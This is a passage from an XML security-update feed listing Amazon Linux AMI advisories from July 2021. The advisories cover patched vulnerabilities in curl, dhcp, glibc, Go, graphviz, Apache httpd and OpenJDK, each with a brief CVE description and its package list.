</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22876" title="" id="CVE-2021-22876" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22898" title="" id="CVE-2021-22898" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.61.1" release="12.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.98.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.98.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.98.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.98.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.98.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.98.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.98.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.98.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.98.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.98.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.98.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.98.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1510</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1510: important priority package update for dhcp</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-25217:
A flaw was found in the Dynamic Host Configuration Protocol (DHCP). There is a discrepancy between the code that handles encapsulated option information in leases transmitted "on the wire" and the code which reads and parses lease information after it has been written to disk storage. This flaw allows an attacker to deliberately cause a situation where dhcpd while running in DHCPv4 or DHCPv6 mode, or the dhclient attempts to read a stored lease that contains option information, to trigger a stack-based buffer overflow in the option parsing code for colon-separated hex digits values. The highest threat from this vulnerability is to data confidentiality and integrity as well as service availability.
1963258: CVE-2021-25217 dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25217" title="" id="CVE-2021-25217" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1511</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1511: medium priority package update for glibc</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-29573:
A stack buffer overflow flaw was found in glibc in the way the printf family of functions processed an 80-bit long double with a non-canonical bit pattern. This flaw allows an attacker who can control the arguments of these functions with the non-standard long double pattern to trigger an overflow and cause an application crash. The highest threat from this vulnerability is to system availability.
1905213: CVE-2020-29573 glibc: stack-based buffer overflow if the input to any of the printf family of functions is an 80-bit long double with a non-canonical bit pattern
CVE-2020-10029:
A flaw was found in glibc in versions prior to 2.32. Pseudo-zero values are not validated causing a stack corruption due to a stack-based overflow. The highest threat from this vulnerability is to system availability.
1810670: CVE-2020-10029 glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions
CVE-2019-25013:
A flaw was found in glibc. When processing input in the EUC-KR encoding, an invalid input sequence could cause glibc to read beyond the end of a buffer, resulting in a segmentation fault. The highest threat from this vulnerability is to system availability.
1912960: CVE-2019-25013 glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding
CVE-2019-19126:
A vulnerability was discovered in glibc where the LD_PREFER_MAP_32BIT_EXEC environment variable is not ignored when running binaries with the setuid flag on x86_64 architectures. This allows an attacker to force system to utilize only half of the memory (making the system think the software is 32-bit only), thus lowering the amount of memory being used with address space layout randomization (ASLR). The highest threat is confidentiality although the complexity of attack is high. The affected application must already have other vulnerabilities for this flaw to be usable.
1774681: CVE-2019-19126 glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126" title="" id="CVE-2019-19126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013" title="" id="CVE-2019-25013" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029" title="" id="CVE-2020-10029" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29573" title="" id="CVE-2020-29573" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nscd" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-322.181.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-322.181.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1512</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1512: medium priority package update for golang</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-31525:
A vulnerability was found in net/http of the Go standard library when parsing very large HTTP header values, causing a crash and subsequent denial of service. This vulnerability affects both clients and servers written in Go, however servers are only vulnerable if the default 1 MB value for MaxHeaderBytes is increased.
1958341: CVE-2021-31525 golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31525" title="" id="CVE-2021-31525" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.15.12" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.12-1.67.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.15.12" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.12-1.67.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.15.12" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.12-1.67.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.12" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.12-1.67.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.15.12" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.12-1.67.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.15.12" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.12-1.67.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.15.12" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.12-1.67.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.12" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.12-1.67.amzn1.i686.rpm</filename></package><package name="golang" version="1.15.12" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.12-1.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1513</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1513: medium priority package update for graphviz</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-18032:
A flaw was found in graphviz. A wrong assumption in record_init function leads to an off-by-one write in parse_reclbl function, allowing an attacker who can provide graph input to potentially execute code when the label of a node is invalid and shorter than two characters. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1966272: CVE-2020-18032 graphviz: off-by-one in parse_reclbl() in lib/common/shapes.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-18032" title="" id="CVE-2020-18032" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-devel" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-python26" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python26-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-java-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-python27" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python27-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-python27" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python27-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-python26" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python26-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.38.0-18.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1514</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1514: medium priority package update for httpd24</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-30641:
A flaw was found in Apache httpd. A possible regression from an earlier security fix broke behavior of MergeSlashes. The highest threat from this vulnerability is to data integrity.
1966743: CVE-2021-30641 httpd: MergeSlashes regression
CVE-2021-26691:
A heap overflow flaw was found In Apache httpd mod_session. The highest threat from this vulnerability is to system availability.
1966732: CVE-2021-26691 httpd: Heap overflow in mod_session
CVE-2021-26690:
A NULL pointer dereference was found in Apache httpd mod_session. The highest threat from this vulnerability is to system availability.
1966729: CVE-2021-26690 httpd: mod_session NULL pointer dereference in parser
CVE-2020-35452:
A flaw was found in Apache httpd. The mod_auth_digest has a single zero byte stack overflow. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1966724: CVE-2020-35452 httpd: Single zero byte stack overflow in mod_auth_digest
CVE-2020-13950:
A flaw was found In Apache httpd. The mod_proxy has a NULL pointer dereference. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1966738: CVE-2020-13950 httpd: mod_proxy NULL pointer dereference
CVE-2020-13938:
A flaw was found in HTTPd. In some Apache HTTP Server versions, unprivileged local users can stop HTTPd on Windows. The highest threat from this vulnerability is to system availability.
1970006: CVE-2020-13938 httpd: Improper Handling of Insufficient Privileges
CVE-2019-17567:
A flaw was found in Apache httpd. The mod_proxy_wstunnel module tunnels non-upgraded connections.
1966740: CVE-2019-17567 httpd: mod_proxy_wstunnel tunneling of non Upgraded connection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17567" title="" id="CVE-2019-17567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13938" title="" id="CVE-2020-13938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13950" title="" id="CVE-2020-13950" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35452" title="" id="CVE-2020-35452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26690" title="" id="CVE-2021-26690" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26691" title="" id="CVE-2021-26691" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30641" title="" id="CVE-2021-30641" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.48" release="1.92.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.48" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.48-1.92.amzn1.noarch.rpm</filename></package><package name="mod24_session" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.48" release="1.92.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.48" release="1.92.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.48" release="1.92.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.48-1.92.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1515</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1515: medium priority package update for java-1.8.0-openjdk</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-2163:
Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16; Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N).
1951217: CVE-2021-2163 OpenJDK: Incomplete enforcement of JAR signing disabled algorithms (Libraries, 8249906)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2163" title="" id="CVE-2021-2163" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-src" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.292.b10-1.63.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.292.b10-1.63.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1516</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1516: medium priority package update for 